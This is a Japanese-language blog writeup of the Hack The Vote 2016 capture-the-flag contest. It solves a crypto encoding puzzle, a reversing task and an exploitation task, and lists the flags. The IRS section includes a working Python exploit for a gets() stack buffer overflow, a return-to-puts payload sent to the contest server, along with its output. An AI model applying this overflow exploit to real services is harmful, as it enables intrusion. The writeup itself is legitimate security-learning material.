Hack The Vote 2016 供養(Writeup)

Hack The Vote 2016に参加。251ptで244位。

Sanity (Vote 1)

サービス問題。

The flag is flag{th3r3_1s_0nly_on3_ch0ic3}

TOPKEK (Crypto 50)

次のようなテキストファイルが与えられる。

$ cat kek.43319559636b94db1c945834340b65d68f90b6ecbb70925f7b24f6efc5c2524e.txt
KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP!! KEK!!! TOP!! KEK!!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP!!!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!!!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK!!!!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP! KEK!! TOP! KEK!!!! TOP!!! KEK! TOP! KEK!!! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP!!! KEK!!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK!! TOP! KEK!!! TOP!! KEK!! TOP!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!!!! KEK!! TOP! KEK!! TOP!! KEK!!!!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP!!! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK! TOP!!!!! KEK! TOP!

KEKを0、TOPを1とし、!の数だけその数字が繰り返されるものとして2進数で表し、さらに16進に直すとFlagが得られる。

data = open('kek.43319559636b94db1c945834340b65d68f90b6ecbb70925f7b24f6efc5c2524e.txt').read()
s = ''
for word in data.split():
    if 'KEK' in word:
        c = '0'
    else:
        c = '1'
    s += c * (len(word)-3)
s = "%x" % int(s, 2)
print s.decode('hex')

Consul (Reversing 100)

関数c8で文字列bの各バイトに変数memの値を足したものを出力している。

.text:0000000000400A09                 public c8
.text:0000000000400A09 c8              proc near
.text:0000000000400A09                 push    rbp
.text:0000000000400A0A                 mov     rbp, rsp
.text:0000000000400A0D                 mov     eax, cs:mem
.text:0000000000400A13                 add     eax, 9
.text:0000000000400A16                 mov     cs:mem, eax
.text:0000000000400A1C                 mov     edi, offset b
.text:0000000000400A21                 call    add_mem
.text:0000000000400A26                 mov     rsi, rax
.text:0000000000400A29                 mov     edi, offset format ; "%s\r\n"
.text:0000000000400A2E                 mov     eax, 0
.text:0000000000400A33                 call    _printf
.text:0000000000400A38                 pop     rbp
.text:0000000000400A39                 retn
.text:0000000000400A39 c8              endp
0000000000601280  26 2C 21 27 3B 37 32 29  34 25 1F 29 2E 1F 22 25  &,!';72)4%.).."%
0000000000601290  32 2E 29 25 E1 3D 00 00  00 00 00 00 00 00 00 00  2.)%.=..........

26 2C 21 2766 6C 61 67 (flag)になると推測して、各バイトに0x40を足してみるとflagが得られた。

$ python
Python 2.7.12 (default, Jul  1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> x = """26 2C 21 27 3B 37 32 29  34 25 1F 29 2E 1F 22 25
... 32 2E 29 25 E1 3D"""
>>> x = x.replace('\n', '').replace(' ', '').decode('hex')
>>> ''.join(chr((ord(c)+0x40) % 0x100) for c in x)
'flag{write_in_bernie!}'

IRS (Exploitation 100)

Editを選んだ後y/nを聞かれる箇所でgets関数が使われており、スタックバッファオーバーフロー脆弱性がある。

.text:080488FD 68 BE 92 04 08                    push    offset aYN      ; "y/n\r"
.text:08048902 E8 F1 FB FF FF                    call    puts
.text:08048907 83 C4 10                          add     esp, 10h
.text:0804890A 83 EC 0C                          sub     esp, 0Ch
.text:0804890D 8D 45 EB                          lea     eax, [ebp+s]
.text:08048910 50                                push    eax             ; s
.text:08048911 E8 C2 FB FF FF                    call    gets

ヒントを参考に、文字列not_the_flagをセットしている箇所のコードを出力させることでFlagが得られる。

Hint: not_the_flag will actually be the flag on the server

from minipwn import *

def menu_file(s, name, password, income, deductible):
    print s.recv(8192)
    sendline(s, '1')
    print recvuntil(s, ': ')
    sendline(s, name)
    print recvuntil(s, ': ')
    sendline(s, password)
    print recvuntil(s, ': ')
    sendline(s, str(income))
    print recvuntil(s, ': ')
    sendline(s, str(deductible))
    print recvuntil(s, '!\r\n')

def menu_edit(s, name, password, income, deductible, yorn):
    print s.recv(8192)
    sendline(s, '3')
    print recvuntil(s, ': ')
    sendline(s, name)
    print recvuntil(s, ': ')
    sendline(s, password)
    print recvuntil(s, ': ')
    sendline(s, str(income))
    print recvuntil(s, ': ')
    sendline(s, str(deductible))
    print recvuntil(s, 'y/n\r\n')
    sendline(s, yorn)
    print recvuntil(s, '!\r\n')

#s = connect_process(['./irs.4ded467171bb532f7dba8e8fe42a1fc121aa1498a3f1748064755e2566593360'])
s = socket.create_connection(('irs.pwn.republican', 4127))
raw_input()
menu_file(s, 'AAAA', 'BBBB', 100, 100)

plt_puts = 0x80484F8
addr_text = 0x8048AC2

buf = 'A' * 25
buf += p32(plt_puts) + 'AAAA' + p32(addr_text)

menu_edit(s, 'AAAA', 'BBBB', 100, 100, buf)
data = s.recv(8192)
print "%r" % data
$ python test.py

Welcome to the IRS!
How may we serve you today?
1. File a tax return
2. Delete a tax return
3. Edit a tax return
4. View a tax return
5. Exit

Tax returns on file:
0 - Donald Trump

Enter the name:
Enter the password:
Enter the income:
Enter the deductions:
Thank you for doing your civic duty AAAA!

Welcome to the IRS!
How may we serve you today?
1. File a tax return
2. Delete a tax return
3. Edit a tax return
4. View a tax return
5. Exit

Tax returns on file:
0 - Donald Trump
1 - AAAA

Enter the name of the file to edit:
Enter the password:
Enter the new income:
Enter the new deductible:
Is this correct?
Income: 100
Deductible: 100
y/n

Your changes have been recorded!

'flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN\x8bE\xf0\x89E\xd0\x83\xec\x0c\x8dE\xd0P\xe8,\xfb\xff\xff\x83\xc4\x10\xa1 \xb0\x04\x08\x83\xec\x04Pj\x03\x8dE\xe5P\xe8\xc2\xf9\xff\xff\x83\xc4\x10\x83\xec\x04j2j\n'

$ echo -en 'flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN\x8bE\xf0\x89E\xd0\x83\xec\x0c\x8dE\xd0P\xe8,\xfb\xff\xff\x83\xc4\x10\xa1 \xb0\x04\x08\x83\xec\x04Pj\x03\x8dE\xe5P\xe8\xc2\xf9\xff\xff\x83\xc4\x10\x83\xec\x04j2j\n' | strings | tr -d '\n'
flag{c4n_1_g3t_a_r3fund}

所感

他に解きたかった問題は以下。

関連リンク